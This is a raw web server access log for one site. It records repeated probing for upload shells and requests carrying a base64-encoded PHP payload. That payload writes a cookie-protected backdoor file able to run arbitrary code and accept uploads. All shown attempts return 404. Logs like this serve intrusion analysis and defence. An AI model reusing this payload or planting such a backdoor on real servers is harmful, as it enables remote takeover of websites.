37.112.223.135 - - [07/Dec/2025:13:19:55 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2852.53 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:13:19:36 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2880.26 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:13:19:37 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2880.26 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:13:29:11 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)"
37.112.223.135 - - [07/Dec/2025:13:29:12 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)"
37.112.223.135 - - [07/Dec/2025:13:29:26 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)"
37.112.223.135 - - [07/Dec/2025:13:29:27 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)"
37.112.223.135 - - [07/Dec/2025:13:29:28 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)"
37.112.223.135 - - [07/Dec/2025:13:29:28 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)"
43.134.141.244 - - [07/Dec/2025:12:34:14 +0000] "GET /php.ini HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [07/Dec/2025:12:39:26 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2726.34 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:12:39:26 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2726.34 Safari/537.36"
43.155.140.157 - - [07/Dec/2025:12:45:24 +0000] "GET /seughtunghdyyshry/admin/login HTTP/1.1" 200 0 "http://metalescrose.com/seughtunghdyyshry/admin/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
37.112.223.135 - - [07/Dec/2025:12:58:35 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2772.39 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:12:59:15 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2772.39 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:12:59:16 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2772.39 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:13:09:30 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2915.54 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:13:19:13 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2852.53 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:13:19:13 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2852.53 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:13:19:32 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2880.26 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:13:19:53 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2852.53 Safari/537.36"
66.249.64.110 - - [07/Dec/2025:13:28:47 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvd2ViYWxpemVyL3dlYmFsaXplci5jdXJyZW50 HTTP/1.1" 200 19757 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:13:38:32 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2824.96 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:13:38:32 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2824.96 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:13:19:55 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2852.53 Safari/537.36"
66.249.64.110 - - [07/Dec/2025:13:21:54 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvd2ViYWxpemVyL2hvdXJseV91c2FnZV8yMDI0MTEucG5n HTTP/1.1" 200 2117 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:13:38:49 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2824.96 Safari/537.36"
66.249.64.110 - - [07/Dec/2025:13:32:42 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvd2ViYWxpemVyL2hvdXJseV91c2FnZV8yMDIzMDIucG5n HTTP/1.1" 200 2175 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:13:38:52 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2824.96 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:13:38:52 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2824.96 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:13:38:53 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2824.96 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:13:48:46 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; WOW64; Trident/6.0)"
198.186.131.59 - - [07/Dec/2025:13:48:46 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; WOW64; Trident/6.0)"
198.186.131.59 - - [07/Dec/2025:13:57:01 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
198.186.131.59 - - [07/Dec/2025:13:57:25 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
198.186.131.59 - - [07/Dec/2025:13:57:25 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.112.223.135 - - [07/Dec/2025:14:08:02 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:14:08:03 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:14:08:04 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:13:48:45 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; WOW64; Trident/6.0)"
198.186.131.59 - - [07/Dec/2025:13:57:26 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
198.186.131.59 - - [07/Dec/2025:13:57:26 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
198.186.131.59 - - [07/Dec/2025:13:57:27 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
45.227.253.15 - - [07/Dec/2025:14:15:51 +0000] "GET /index.php/jk HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/102.0"
192.121.16.196 - - [07/Dec/2025:14:18:55 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [07/Dec/2025:14:18:56 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [07/Dec/2025:14:18:57 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 